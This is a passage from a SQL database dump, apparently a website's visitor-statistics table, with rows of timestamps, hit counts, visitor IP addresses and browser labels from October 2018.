66.157','chrome'),(318093,1539682082,1,1,0,0,'54.36.148.203','other'),(318094,1539682320,1,1,0,0,'54.36.149.79','other'),(318095,1539682469,1,1,0,0,'207.46.13.59','other'),(318096,1539682726,1,1,0,0,'8.29.198.27','other'),(318097,1539682772,1,1,0,0,'54.36.148.175','other'),(318098,1539682890,1,1,0,0,'8.29.198.26','other'),(318099,1539682928,1,1,0,0,'54.36.148.215','other'),(318100,1539683416,1,1,0,0,'54.36.149.62','other'),(318101,1539683446,1,1,0,0,'216.244.66.241','other'),(318102,1539683552,1,1,0,0,'54.36.148.136','other'),(318103,1539683629,1,1,0,0,'54.36.148.253','other'),(318104,1539683652,1,1,0,0,'54.36.148.121','other'),(318105,1539684015,1,1,0,0,'91.196.178.73','chrome'),(318106,1539684149,1,1,0,0,'54.36.149.88','other'),(318107,1539684279,1,1,0,0,'54.36.148.149','other'),(318108,1539684342,1,1,0,0,'54.36.149.107','other'),(318109,1539684888,1,1,0,0,'54.36.148.13','other'),(318110,1539685298,1,1,0,0,'46.229.168.134','other'),(318111,1539685335,1,1,0,0,'40.77.167.64','other'),(318112,1539685788,1,1,0,0,'54.36.149.60','other'),(318113,1539686024,1,1,0,0,'216.244.66.241','other'),(318114,1539686526,1,1,0,0,'54.36.148.252','other'),(318115,1539686606,1,1,0,0,'46.164.130.92','chrome'),(318116,1539686638,1,1,0,0,'8.29.198.25','other'),(318117,1539686759,1,1,0,0,'54.36.149.24','other'),(318118,1539687125,1,1,0,0,'54.36.148.155','other'),(318119,1539687149,1,1,0,0,'178.92.129.20','chrome'),(318120,1539687293,1,1,0,0,'54.36.149.86','other'),(318121,1539687462,1,1,0,0,'54.36.148.32','other'),(318122,1539687476,1,1,0,0,'54.36.148.48','other'),(318123,1539688131,1,1,0,0,'54.36.148.202','other'),(318124,1539688143,1,1,0,0,'54.36.149.20','other'),(318125,1539688399,1,1,0,0,'54.36.148.174','other'),(318126,1539688577,1,1,0,0,'216.244.66.241','other'),(318127,1539688768,1,1,0,0,'54.36.148.78','other'),(318128,1539688855,1,1,0,0,'54.36.148.69','other'),(318129,1539689309,1,1,0,0,'54.36.148.124','other'),(318130,1539689369,1,1,0,0,'54.36.149.29','other'),(318131,1539689604,1,1,0,0,'66.249.66.155','chrome'),(318132,1539690093,1,1,0,0,'91.196.178.175','chrome'),(318133,1539690197,1,1,0,0,'46.229.168.133','other'),(318134,1539690273,1,1,0,0,'91.196.178.136','firefox'),(318135,1539690337,1,1,0,0,'54.36.148.75','other'),(318136,1539690528,1,1,0,0,'54.36.149.56','other'),(318137,1539690661,1,1,0,0,'40.77.167.64','other'),(318138,1539690726,1,1,0,0,'130.180.216.22','chrome'),(318139,1539691277,1,1,0,0,'54.36.148.29','other'),(318140,1539691668,1,1,0,0,'91.196.178.178','chrome'),(318141,1539691825,1,1,0,0,'91.196.178.73','chrome'),(318142,1539691973,1,1,0,0,'54.36.149.106','other'),(318143,1539692014,1,1,0,0,'157.55.39.121','other'),(318144,1539692233,1,1,0,0,'54.36.149.64','other'),(318145,1539692350,1,1,0,0,'54.36.149.11','other'),(318146,1539692402,1,1,0,0,'178.154.244.29','other'),(318147,1539692475,1,1,0,0,'54.36.148.149','other'),(318148,1539692922,2,2,0,0,'40.77.167.64','other'),(318149,1539693026,1,1,0,0,'54.36.149.69','other'),(318150,1539693137,1,1,0,0,'66.249.66.155','chrome'),(318151,1539693580,2,2,0,0,'8.29.198.27','other'),(318152,1539693621,2,2,0,0,'178.62.137.173','chrome'),(318153,1539693641,1,1,0,0,'178.95.109.19','opera'),(318154,1539693815,1,1,0,0,'54.36.149.35','other'),(318155,1539693851,1,1,0,0,'54.36.148.208','other'),(318156,1539694060,1,1,0,0,'54.36.149.0','other'),(318157,1539694346,1,1,0,0,'46.211.108.82','other'),(318158,1539694462,1,1,0,0,'46.229.168.135','other'),(318159,1539694544,1,1,0,0,'54.36.149.79','other'),(318160,1539694823,1,1,0,0,'46.229.168.142','other'),(318161,1539694967,1,1,0,0,'54.36.149.17','other'),(318162,1539695825,1,1,0,0,'54.36.148.18','other'),(318163,1539695967,1,1,0,0,'216.244.66.241','other'),(318164,1539696201,2,0,2,0,'66.249.66.156',''),(318165,1539696445,1,1,0,0,'54.36.149.62','other'),(318166,1539697307,1,1,0,0,'54.36.148.143','other'),(318167,1539697497,1,1,0,0,'8.29.198.26','other'),(318168,1539697588,1,1,0,0,'54.36.149.91','other'),(318169,1539697861,1,1,0,0,'54.36.148.120','other'),(318170,1539697967,1,1,0,0,'54.36.148.80','other'),(318171,1539698046,1,1,0,0,'91.196.178.73','chrome'),(318172,1539698179,1,1,0,0,'54.36.149.27','other'),(318173,1539698477,1,1,0,0,'54.36.148.153','other'),(318174,1539698562,1,1,0,0,'69.12.66.253','chrome'),(318176,1539698572,1,1,0,0,'69.12.66.226','chrome'),(318177,1539698607,1,1,0,0,'54.36.148.82','other'),(318178,1539698610,1,1,0,0,'91.196.178.89','firefox'),(318179,1539698747,24,24,0,0,'54.156.39.245','other'),(318180,1539698751,1,1,0,0,'54.36.148.198','other'),(318181,1539699082,1,1,0,0,'193.106.30.98','firefox'),(318182,1539699337,1,1,0,0,'46.229.168.146','other'),(318183,1539699520,1,1,0,0,'54.36.148.201','other'),(318184,1539699674,1,1,0,0,'98.143.159.172','chrome'),(318185,1539699792,8,8,0,0,'54.156.39.245','other'),(318186,1539700012,1,1,0,0,'54.36.148.185','other'),(318187,1539700125,1,1,0,0,'46.229.168.130','other'),(318188,1539700142,1,1,0,0,'98.143.159.174','chrome'),(318189,1539700297,1,1,0,0,'62.205.134.182','msie'),(318190,1539700361,1,1,0,0,'54.36.148.220','other'),(318191,1539700379,1,1,0,0,'54.36.148.191','other'),(318192,1539700414,1,1,0,0,'54.36.148.210','other'),(318193,1539700642,1,1,0,0,'54.36.149.53','other'),(318194,1539700696,10,10,0,0,'54.156.39.245','other'),(318195,1539700707,1,1,0,0,'54.36.148.211','other'),(318196,1539700816,1,1,0,0,'54.36.148.34','other'),(318197,1539701362,1,1,0,0,'54.36.148.96','other'),(318198,1539701390,1,1,0,0,'66.249.66.155','chrome'),(318199,1539701484,1,1,0,0,'54.36.149.91','other'),(318200,1539701493,1,1,0,0,'54.36.149.50','other'),(318201,1539701689,1,1,0,0,'54.36.148.100','other'),(318202,1539701769,9,9,0,0,'54.156.39.245','other'),(318203,1539701829,1,1,0,0,'54.36.148.55','other'),(318204,1539701979,1,1,0,0,'66.249.66.59','chrome'),(318205,1539702014,1,1,0,0,'54.36.148.43','other'),(318206,1539702142,1,1,0,0,'54.36.148.223','other'),(318207,1539702477,1,1,0,0,'54.36.149.39','other'),(318208,1539702545,3,3,0,0,'178.154.244.11','other'),(318209,1539702594,2,2,0,0,'91.196.177.15','chrome'),(318210,1539702629,1,1,0,0,'188.230.43.254','other'),(318211,1539702649,5,5,0,0,'178.154.244.29','other'),(318212,1539702675,14,14,0,0,'54.156.39.245','other'),(318213,1539702743,1,1,0,0,'54.36.148.141','other'),(318214,1539703025,1,1,0,0,'54.36.148.152','other'),(318215,1539703045,3,3,0,0,'5.45.207.79','other'),(318216,1539703048,1,1,0,0,'141.8.142.103','other'),(318217,1539703050,2,2,0,0,'5.45.207.19','other'),(318218,1539703062,1,1,0,0,'37.9.113.148','other'),(318219,1539703141,1,1,0,0,'46.211.11.4','chrome'),(318220,1539703185,1,1,0,0,'66.249.66.157','chrome'),(318221,1539703275,1,1,0,0,'66.249.66.155','chrome'),(318222,1539703281,1,1,0,0,'54.36.148.147','other'),(318223,1539703552,1,1,0,0,'54.36.149.64','other'),(318224,1539703608,7,7,0,0,'54.156.39.245','other'),(318225,1539703686,3,3,0,0,'178.154.244.29','other'),(318226,1539703745,3,3,0,0,'178.154.244.11','other'),(318227,1539703788,1,1,0,0,'54.36.148.38','other'),(318228,1539703826,1,1,0,0,'66.249.66.156','chrome'),(318229,1539704124,1,1,0,0,'66.249.66.157','chrome'),(318230,1539704149,1,1,0,0,'5.45.207.19','other'),(318231,1539704274,1,1,0,0,'54.36.149.43','other'),(318232,1539704302,1,1,0,0,'54.36.149.39','other'),(318233,1539704429,1,1,0,0,'8.29.198.27','other'),(318234,1539704543,1,1,0,0,'46.229.168.150','other'),(318235,1539704566,1,1,0,0,'8.29.198.26','other'),(318236,1539704568,1,1,0,0,'188.230.43.254','other'),(318237,1539704577,1,1,0,0,'180.76.15.31','other'),(318238,1539704594,3,3,0,0,'54.156.39.245','other'),(318239,1539704739,1,1,0,0,'5.45.207.79','other'),(318240,1539704764,1,1,0,0,'54.36.149.20','other'),(318241,1539705126,2,2,0,0,'178.154.244.11','other'),(318242,1539705360,1,1,0,0,'54.36.148.100','other'),(318243,1539705437,1,1,0,0,'178.154.244.29','other'),(318244,1539705575,1,1,0,0,'157.55.39.50','other'),(318245,1539705843,1,1,0,0,'66.249.66.61','chrome'),(318246,1539705872,1,1,0,0,'95.134.221.101','chrome'),(318247,1539706049,1,1,0,0,'54.36.148.131','other'),(318248,1539706209,3,3,0,0,'216.244.66.241','other'),(318249,1539706283,1,1,0,0,'54.36.149.0','other'),(318250,1539706666,1,1,0,0,'91.196.178.166','chrome'),(318251,1539706969,1,1,0,0,'188.230.43.254','other'),(318252,1539707049,1,1,0,0,'178.154.244.11','other'),(318253,1539707166,1,1,0,0,'54.36.148.142','other'),(318254,1539707202,1,1,0,0,'54.36.148.224','other'),(318255,1539707777,1,1,0,0,'178.154.244.29','other'),(318256,1539708343,1,1,0,0,'8.29.198.26','other'),(318257,1539708417,1,1,0,0,'66.249.66.156','chrome'),(318258,1539708497,1,1,0,0,'216.244.66.241','other'),(318259,1539708800,1,1,0,0,'178.154.244.11','other'),(318260,1539708837,1,1,0,0,'54.36.149.92','other'),(318261,1539709368,1,1,0,0,'188.230.43.254','other'),(318262,1539709829,1,1,0,0,'66.249.66.155','chrome'),(318263,1539710333,1,1,0,0,'54.36.148.153','other'),(318264,1539710714,1,1,0,0,'54.36.148.29','other'),(318265,1539710734,1,1,0,0,'95.163.255.93','other'),(318266,1539710982,1,1,0,0,'54.36.148.142','other'),(318267,1539711024,3,3,0,0,'216.244.66.241','other'),(318268,1539711086,1,1,0,0,'54.36.149.3','other'),(318269,1539711939,1,1,0,0,'66.102.9.35','chrome'),(318270,1539712006,1,1,0,0,'54.36.148.71','other'),(318271,1539712628,1,1,0,0,'54.36.149.46','other'),(318272,1539712631,1,1,0,0,'54.36.148.96','other'),(318273,1539712669,1,1,0,0,'54.36.148.63','other'),(318274,1539712759,1,1,0,0,'54.36.149.90','other'),(318275,1539713043,1,1,0,0,'54.36.148.141','other'),(318276,1539713681,1,1,0,0,'54.36.149.68','other'),(318277,1539713892,4,4,0,0,'178.154.244.29','other'),(318278,1539714168,1,1,0,0,'54.36.148.38','other'),(318279,1539714188,1,1,0,0,'54.36.148.15','other'),(318280,1539714506,1,1,0,0,'54.36.148.125','other'),(318281,1539714746,2,2,0,0,'54.36.148.81','other'),(318282,1539714847,1,1,0,0,'66.249.66.61','chrome'),(318283,1539714971,1,1,0,0,'54.36.148.58','other'),(318284,1539715282,2,2,0,0,'8.29.198.27','other'),(318285,1539715375,1,1,0,0,'66.249.66.155','chrome'),(318286,1539715470,1,1,0,0,'54.36.148.209','other'),(318287,1539716530,1,1,0,0,'216.244.66.241','other'),(318288,1539716622,1,1,0,0,'54.36.148.73','other'),(318289,1539717056,1,1,0,0,'54.36.148.85','other'),(318290,1539717830,1,1,0,0,'66.249.66.157','chrome'),(318291,1539717937,3,3,0,0,'66.249.66.155','chrome'),(318292,1539718129,1,1,0,0,'180.76.15.146','other'),(318293,1539718332,1,1,0,0,'46.229.168.154','other'),(318294,1539718463,1,1,0,0,'54.36.148.147','other'),(318295,1539718931,1,1,0,0,'66.249.66.157','chrome'),(318296,1539719183,1,1,0,0,'8.29.198.27','other'),(318297,1539719188,1,1,0,0,'54.36.148.113','other'),(318298,1539719309,1,1,0,0,'54.36.148.72','other'),(318299,1539719397,1,1,0,0,'54.36.148.40','other'),(318300,1539719791,1,1,0,0,'54.36.148.132','other'),(318301,1539719864,1,1,0,0,'54.36.148.133','other'),(318302,1539719931,1,1,0,0,'46.229.168.135','other'),(318303,1539720006,1,1,0,0,'54.36.148.124','other'),(318304,1539720178,1,0,1,0,'66.249.66.59',''),(318305,1539720270,1,1,0,0,'54.36.148.217','other'),(318306,1539720295,1,1,0,0,'54.36.148.20','other'),(318307,1539720324,1,1,0,0,'54.36.148.122','other'),(318308,1539720510,1,1,0,0,'91.196.178.135','chrome'),(318309,1539720864,1,1,0,0,'54.36.148.83','other'),(318310,1539720912,1,1,0,0,'66.249.66.157','chrome'),(318311,1539721224,1,1,0,0,'54.36.148.109','other'),(318312,1539721264,1,1,0,0,'66.249.66.59','chrome'),(318313,1539721884,1,1,0,0,'54.36.148.77','other'),(318314,1539721885,26,26,0,0,'54.92.163.105','other'),(318315,1539722129,1,1,0,0,'180.76.15.163','other'),(318316,1539722515,1,1,0,0,'54.36.148.226','other'),(318317,1539722836,13,13,0,0,'54.92.163.105','other'),(318318,1539722984,1,1,0,0,'54.36.148.123','other'),(318319,1539723183,1,1,0,0,'66.249.66.157','chrome'),(318320,1539723190,1,1,0,0,'54.36.149.224','other'),(318321,1539723733,1,1,0,0,'54.36.148.83','other'),(318322,1539723746,10,10,0,0,'54.92.163.105','other'),(318323,1539723866,1,1,0,0,'54.36.148.223','other'),(318324,1539724088,1,1,0,0,'95.163.255.97','other'),(318325,1539724477,1,1,0,0,'194.44.195.26','firefox'),(318326,1539724678,18,18,0,0,'54.92.163.105','other'),(318327,1539724852,1,1,0,0,'54.36.148.215','other'),(318328,1539725098,1,1,0,0,'54.36.149.75','other'),(318329,1539725208,1,1,0,0,'54.36.148.94','other'),(318330,1539725669,18,18,0,0,'54.92.163.105','other'),(318331,1539726051,1,1,0,0,'54.36.149.61','other'),(318332,1539726143,1,1,0,0,'8.29.198.26','other'),(318333,1539726247,1,1,0,0,'8.29.198.27','other'),(318334,1539726583,15,15,0,0,'54.92.163.105','other'),(318335,1539727508,1,1,0,0,'54.36.148.43','other'),(318336,1539727685,1,1,0,0,'54.36.148.96','other'),(318337,1539727784,1,1,0,0,'54.36.148.69','other'),(318338,1539728203,1,1,0,0,'54.36.148.246','other'),(318339,1539728206,1,1,0,0,'54.36.149.105','other'),(318340,1539728536,1,1,0,0,'54.36.149.1','other'),(318341,1539728556,1,1,0,0,'54.36.148.237','other'),(318342,1539728660,1,1,0,0,'54.36.149.22','other'),(318343,1539728683,1,1,0,0,'54.36.148.22','other'),(318344,1539728705,1,1,0,0,'54.36.148.17','other'),(318345,1539728728,1,1,0,0,'54.36.148.12','other'),(318346,1539728921,1,1,0,0,'95.163.255.97','other'),(318347,1539728997,1,1,0,0,'54.36.149.71','other'),(318348,1539729051,1,1,0,0,'95.163.255.98','other'),(318349,1539729144,1,1,0,0,'54.36.149.58','other'),(318350,1539729227,2,2,0,0,'216.244.66.241','other'),(318351,1539729492,1,1,0,0,'54.36.149.45','other'),(318352,1539729496,1,1,0,0,'46.229.168.149','other'),(318353,1539729739,1,1,0,0,'54.36.149.84','other'),(318354,1539729753,7,7,0,0,'39.105.27.78','firefox'),(318355,1539730021,1,1,0,0,'8.29.198.25','other'),(318356,1539730090,1,1,0,0,'54.36.148.118','other'),(318357,1539730272,1,1,0,0,'54.36.148.224','other'),(318358,1539730642,1,1,0,0,'54.36.148.13','other'),(318359,1539730784,1,1,0,0,'54.36.149.17','other'),(318360,1539731323,1,1,0,0,'54.36.148.207','other'),(318361,1539731363,1,1,0,0,'54.165.59.7','other'),(318362,1539731523,1,1,0,0,'54.36.148.181','other'),(318363,1539731804,1,1,0,0,'54.36.148.184','other'),(318364,1539731906,1,1,0,0,'54.36.148.239','other'),(318365,1539732028,1,1,0,0,'54.36.149.79','other'),(318366,1539732283,1,1,0,0,'54.36.148.27','other'),(318367,1539732414,1,1,0,0,'54.36.149.92','other'),(318368,1539732546,1,1,0,0,'54.36.148.211','other'),(318369,1539732971,1,1,0,0,'54.36.148.171','other'),(318370,1539733354,1,1,0,0,'46.229.168.151','other'),(318371,1539733413,1,1,0,0,'54.36.149.102','other'),(318372,1539733430,1,1,0,0,'54.36.148.250','other'),(318373,1539733913,1,1,0,0,'54.36.148.113','other'),(318374,1539733914,1,1,0,0,'54.36.149.52','other'),(318375,1539734137,1,1,0,0,'216.244.66.241','other'),(318376,1539734574,1,1,0,0,'54.36.149.7','other'),(318377,1539734952,1,1,0,0,'54.36.148.20','other'),(318378,1539735683,1,1,0,0,'54.36.148.159','other'),(318379,1539735917,1,1,0,0,'54.36.148.220','other'),(318380,1539736093,1,1,0,0,'54.36.148.166','other'),(318381,1539736100,1,1,0,0,'54.36.149.82','other'),(318382,1539736250,1,1,0,0,'54.36.148.226','other'),(318383,1539736674,4,4,0,0,'216.244.66.241','other'),(318384,1539736784,1,1,0,0,'54.36.149.6','other'),(318385,1539736785,1,1,0,0,'54.36.148.232','other'),(318386,1539736998,2,2,0,0,'8.29.198.26','other'),(318387,1539737025,1,1,0,0,'54.36.149.55','other'),(318388,1539737437,1,1,0,0,'180.76.15.150','other'),(318389,1539737522,1,1,0,0,'54.36.148.239','other'),(318390,1539737577,1,1,0,0,'54.36.148.63','other'),(318391,1539738241,1,1,0,0,'54.36.148.220','other'),(318392,1539738270,1,1,0,0,'54.36.148.105','other'),(318393,1539738339,1,1,0,0,'54.36.149.95','other'),(318394,1539738494,1,1,0,0,'46.229.168.133','other'),(318395,1539738755,1,1,0,0,'54.36.148.23','other'),(318396,1539738799,1,1,0,0,'54.36.149.40','other'),(318397,1539739356,1,1,0,0,'54.36.148.81','other'),(318398,1539739431,1,1,0,0,'54.36.149.74','other'),(318399,1539739487,1,1,0,0,'54.36.148.213','other'),(318400,1539739645,2,2,0,0,'216.244.66.241','other'),(318401,1539739774,1,1,0,0,'54.36.148.210','other'),(318402,1539740148,1,1,0,0,'54.36.148.156','other'),(318403,1539740183,1,1,0,0,'54.36.148.90','other'),(318404,1539740364,1,1,0,0,'54.36.148.151','other'),(318405,1539740473,1,1,0,0,'54.36.148.225','other'),(318406,1539740859,1,1,0,0,'8.29.198.27','other'),(318407,1539741379,1,1,0,0,'54.36.148.45','other'),(318408,1539741402,3,3,0,0,'216.244.66.241','other'),(318409,1539741533,1,1,0,0,'54.36.149.71','other'),(318410,1539741575,1,1,0,0,'54.36.148.242','other'),(318411,1539741773,1,1,0,0,'54.36.148.169','other'),(318412,1539742053,1,1,0,0,'54.36.149.54','other'),(318413,1539742367,1,1,0,0,'54.36.148.33','other'),(318414,1539743192,1,1,0,0,'54.36.148.254','other'),(318415,1539743599,2,2,0,0,'40.77.167.167','other'),(318416,1539743619,1,1,0,0,'54.36.149.104','other'),(318417,1539743968,3,3,0,0,'216.244.66.241','other'),(318418,1539744029,1,1,0,0,'95.163.255.93','other'),(318419,1539744433,1,1,0,0,'54.36.149.14','other'),(318420,1539744454,1,1,0,0,'54.36.148.78','other'),(318421,1539745045,1,1,0,0,'54.36.148.32','other'),(318422,1539745139,1,1,0,0,'54.36.148.249','other'),(318423,1539745274,1,1,0,0,'54.36.148.205','other'),(318424,1539745791,1,1,0,0,'54.36.149.1','other'),(318425,1539746156,1,1,0,0,'54.36.149.104','other'),(318426,1539746176,1,1,0,0,'54.36.148.184','other'),(318427,1539747049,1,1,0,0,'216.244.66.241','other'),(318428,1539747320,1,1,0,0,'54.36.148.185','other'),(318429,1539747324,1,1,0,0,'46.229.168.135','other'),(318430,1539747668,1,1,0,0,'54.36.148.223','other'),(318431,1539747856,2,2,0,0,'8.29.198.26','other'),(318432,1539747876,1,1,0,0,'54.36.149.76','other'),(318433,1539747945,1,1,0,0,'51.255.65.46','other'),(318434,1539748062,1,1,0,0,'54.36.149.87','other'),(318435,1539748332,1,1,0,0,'216.244.66.241','other'),(318436,1539748908,1,1,0,0,'54.36.149.102','other'),(318437,1539749104,1,1,0,0,'54.36.149.34','other'),(318438,1539749495,1,1,0,0,'54.36.148.170','other'),(318439,1539749509,1,1,0,0,'62.205.134.182','msie'),(318440,1539749832,1,1,0,0,'54.36.148.238','other'),(318441,1539749833,2,2,0,0,'54.36.148.172','other'),(318442,1539749965,1,1,0,0,'54.36.148.175','other'),(318443,1539750052,1,1,0,0,'54.36.148.73','other'),(318444,1539750888,1,1,0,0,'54.36.148.156','other'),(318445,1539751560,1,1,0,0,'54.36.148.43','other'),(318446,1539751704,1,1,0,0,'8.29.198.27','other'),(318447,1539751877,1,1,0,0,'193.106.30.98','firefox'),(318448,1539751989,1,1,0,0,'46.229.168.139','other'),(318449,1539752139,1,1,0,0,'54.36.148.153','other'),(318450,1539752201,1,1,0,0,'54.36.149.26','other'),(318451,1539752394,1,1,0,0,'216.244.66.241','other'),(318452,1539752521,1,1,0,0,'54.36.148.64','other'),(318453,1539752621,1,1,0,0,'46.229.168.130','other'),(318454,1539752704,1,1,0,0,'54.36.148.230','other'),(318455,1539752826,1,1,0,0,'54.36.148.168','other'),(318456,1539752830,1,1,0,0,'54.36.149.95','other'),(318457,1539753064,1,1,0,0,'54.36.148.178','other'),(318458,1539753323,1,1,0,0,'54.36.148.247','other'),(318459,1539753864,1,1,0,0,'91.196.178.73','chrome'),(318460,1539754041,1,1,0,0,'217.69.143.66','other'),(318461,1539754368,3,3,0,0,'216.244.66.241','other'),(318462,1539754522,1,1,0,0,'178.92.129.20','chrome'),(318463,1539755138,1,1,0,0,'95.163.255.93','other'),(318464,1539755568,2,2,0,0,'91.196.177.46','chrome'),(318465,1539755796,1,1,0,0,'54.36.148.168','other'),(318466,1539755955,1,1,0,0,'54.36.149.33','other'),(318467,1539755995,1,1,0,0,'54.36.149.44','other'),(318468,1539756098,1,1,0,0,'54.36.148.243','other'),(318469,1539756109,1,1,0,0,'178.154.244.29','other'),(318470,1539756434,1,1,0,0,'54.36.148.241','other'),(318471,1539756438,1,1,0,0,'54.36.148.18','other'),(318472,1539756480,1,1,0,0,'66.249.66.156','chrome'),(318473,1539756798,1,1,0,0,'95.163.255.96','other'),(318474,1539756993,1,1,0,0,'54.36.149.41','other'),(318475,1539757125,1,1,0,0,'54.36.148.129','other'),(318476,1539757539,1,1,0,0,'66.249.66.156','chrome'),(318477,1539757640,1,1,0,0,'54.36.148.237','other'),(318478,1539757714,1,1,0,0,'54.36.149.73','other'),(318479,1539757798,1,1,0,0,'54.36.149.74','other'),(318480,1539758392,1,1,0,0,'54.36.148.124','other'),(318481,1539758507,1,1,0,0,'54.36.148.61','other'),(318482,1539758705,1,1,0,0,'54.36.148.43','other'),(318483,1539758722,1,1,0,0,'8.29.198.25','other'),(318484,1539758795,1,1,0,0,'8.29.198.27','other'),(318485,1539758862,1,1,0,0,'46.229.168.138','other'),(318486,1539758985,1,1,0,0,'157.55.39.167','other'),(318487,1539759646,1,1,0,0,'91.196.178.90','firefox'),(318488,1539760200,1,1,0,0,'54.36.149.15','other'),(318489,1539760374,1,1,0,0,'91.196.177.65','chrome'),(318490,1539760405,1,1,0,0,'54.36.148.75','other'),(318491,1539760426,1,1,0,0,'54.36.149.70','other'),(318492,1539760443,1,1,0,0,'91.196.177.46','chrome'),(318493,1539760472,1,1,0,0,'178.154.244.11','other'),(318494,1539760499,1,1,0,0,'54.36.149.7','other'),(318495,1539760691,1,1,0,0,'54.208.102.37','other'),(318496,1539760692,1,1,0,0,'107.21.1.8','other'),(318497,1539761300,1,1,0,0,'54.36.148.172','other'),(318498,1539761303,1,1,0,0,'54.36.148.150','other'),(318499,1539761324,1,1,0,0,'54.36.148.224','other'),(318500,1539761741,1,1,0,0,'66.102.9.40','chrome'),(318501,1539761938,1,1,0,0,'54.36.149.35','other'),(318502,1539762057,1,1,0,0,'95.163.255.94','other'),(318503,1539762094,3,3,0,0,'178.154.244.11','other'),(318504,1539762540,1,1,0,0,'8.29.198.25','other'),(318505,1539762594,3,3,0,0,'178.154.244.29','other'),(318506,1539762678,1,1,0,0,'54.36.148.151','other'),(318507,1539763485,1,1,0,0,'178.154.244.11','other'),(318508,1539763823,1,1,0,0,'178.154.244.29','other'),(318509,1539764122,2,2,0,0,'216.244.66.241','other'),(318510,1539765056,1,1,0,0,'178.154.244.29','other'),(318511,1539765103,1,1,0,0,'95.133.2.55','firefox'),(318512,1539765264,1,1,0,0,'216.244.66.241','other'),(318513,1539765527,1,1,0,0,'178.154.244.11','other'),(318514,1539765771,2,2,0,0,'31.129.77.193','chrome'),(318515,1539765966,1,1,0,0,'54.208.102.37','other'),(318516,1539765968,1,1,0,0,'107.21.1.8','other'),(318517,1539766048,1,1,0,0,'134.249.146.125','chrome'),(318518,1539766355,4,4,0,0,'178.154.244.29','other'),(318519,1539766399,1,1,0,0,'66.102.9.40','chrome'),(318520,1539766550,5,5,0,0,'178.154.244.11','other'),(318521,1539766618,1,1,0,0,'78.111.190.136','chrome'),(318522,1539766998,1,1,0,0,'66.249.66.155','chrome'),(318523,1539767075,1,1,0,0,'216.244.66.241','other'),(318524,1539767315,1,1,0,0,'178.154.244.29','other'),(318525,1539767357,1,1,0,0,'31.129.77.193','chrome'),(318526,1539767363,2,2,0,0,'91.196.178.99','chrome'),(318527,1539768180,1,1,0,0,'178.154.244.11','other'),(318528,1539768247,1,1,0,0,'46.229.168.137','other'),(318529,1539768403,1,1,0,0,'87.250.224.64','other'),(318530,1539768470,1,1,0,0,'95.134.221.176','chrome'),(318531,1539768601,1,1,0,0,'95.163.255.97','other'),(318532,1539768925,1,1,0,0,'207.46.13.216','other'),(318533,1539769341,1,1,0,0,'178.154.244.29','other'),(318534,1539769513,1,1,0,0,'91.196.178.73','chrome'),(318535,1539769592,2,2,0,0,'8.29.198.26','other'),(318536,1539770331,1,1,0,0,'91.196.178.170','firefox'),(318537,1539770496,1,1,0,0,'178.154.244.11','other'),(318538,1539771389,1,1,0,0,'207.46.13.216','other'),(318539,1539771574,2,2,0,0,'178.154.244.29','other'),(318540,1539771834,1,1,0,0,'87.250.224.47','other'),(318541,1539771945,1,1,0,0,'123.126.113.149','other'),(318542,1539771982,1,0,1,0,'37.187.26.42',''),(318543,1539772386,2,2,0,0,'91.196.178.61','chrome'),(318544,1539772531,2,2,0,0,'216.244.66.241','other'),(318545,1539773375,1,1,0,0,'8.29.198.25','other'),(318546,1539773434,1,1,0,0,'95.163.255.92','other'),(318547,1539773903,1,1,0,0,'46.200.246.106','chrome'),(318548,1539773976,1,1,0,0,'46.229.168.134','other'),(318549,1539774006,1,1,0,0,'66.249.66.155','chrome'),(318550,1539774756,1,0,1,0,'66.249.66.61',''),(318551,1539775501,1,1,0,0,'94.130.9.183','other'),(318552,1539775753,1,1,0,0,'95.28.182.4','chrome'),(318553,1539775936,1,1,0,0,'91.196.178.73','chrome'),(318554,1539776037,1,1,0,0,'157.55.39.82','other'),(318555,1539777412,1,1,0,0,'66.249.66.156','chrome'),(318556,1539779540,1,1,0,0,'31.41.70.3','chrome'),(318557,1539779655,1,1,0,0,'194.44.179.166','chrome'),(318558,1539779744,1,1,0,0,'178.154.244.29','other'),(318559,1539779884,1,1,0,0,'46.229.168.154','other'),(318560,1539780451,2,2,0,0,'8.29.198.26','other'),(318561,1539780731,1,1,0,0,'78.111.190.136','chrome'),(318562,1539781077,1,1,0,0,'178.154.244.11','other'),(318563,1539781120,2,2,0,0,'178.154.244.29','other'),(318564,1539781130,1,1,0,0,'5.45.207.19','other'),(318565,1539782158,1,0,1,0,'66.249.66.156',''),(318566,1539782317,1,1,0,0,'13.66.139.0','other'),(318567,1539782773,1,1,0,0,'5.188.210.44','chrome'),(318568,1539783690,1,1,0,0,'54.36.148.184','other'),(318569,1539783986,1,1,0,0,'54.36.148.108','other'),(318570,1539783991,1,1,0,0,'54.36.148.37','other'),(318571,1539784063,1,1,0,0,'54.36.148.225','other'),(318572,1539784212,1,1,0,0,'8.29.198.27','other'),(318573,1539784358,2,2,0,0,'188.40.102.170','other'),(318574,1539784688,1,1,0,0,'54.36.148.74','other'),(318575,1539784771,1,1,0,0,'54.36.148.181','other'),(318576,1539785435,1,1,0,0,'216.244.66.241','other'),(318577,1539785544,1,1,0,0,'54.36.148.134','other'),(318578,1539786113,1,1,0,0,'54.36.148.111','other'),(318579,1539786211,1,1,0,0,'91.196.178.71','firefox'),(318580,1539786400,1,1,0,0,'54.36.148.145','other'),(318581,1539786415,1,1,0,0,'188.230.43.254','other'),(318582,1539787749,1,1,0,0,'91.196.178.134','firefox'),(318583,1539788256,1,1,0,0,'178.154.244.11','other'),(318584,1539788260,1,1,0,0,'178.154.244.29','other'),(318585,1539788644,1,1,0,0,'54.36.148.21','other'),(318586,1539788810,1,1,0,0,'188.230.43.254','other'),(318587,1539788832,1,1,0,0,'54.36.149.75','other'),(318588,1539789573,1,1,0,0,'54.36.148.105','other'),(318589,1539789639,1,1,0,0,'54.36.148.114','other'),(318590,1539789650,1,1,0,0,'69.12.66.226','chrome'),(318591,1539789651,1,1,0,0,'69.12.66.253','chrome'),(318592,1539789704,1,1,0,0,'149.154.152.28','firefox'),(318593,1539789737,1,1,0,0,'54.36.148.72','other'),(318594,1539789960,1,1,0,0,'54.36.148.178','other'),(318595,1539790000,1,1,0,0,'98.143.159.174','chrome'),(318596,1539790006,1,1,0,0,'98.143.159.172','chrome'),(318597,1539790044,1,1,0,0,'157.55.39.81','other'),(318598,1539791036,1,1,0,0,'216.244.66.241','other'),(318599,1539791211,1,1,0,0,'188.230.43.254','other'),(318600,1539791317,2,2,0,0,'8.29.198.27','other'),(318601,1539791357,1,1,0,0,'54.36.148.140','other'),(318602,1539791375,1,1,0,0,'54.36.148.217','other'),(318603,1539791508,1,1,0,0,'91.196.178.131','chrome'),(318604,1539791639,1,1,0,0,'54.36.149.50','other'),(318605,1539791696,1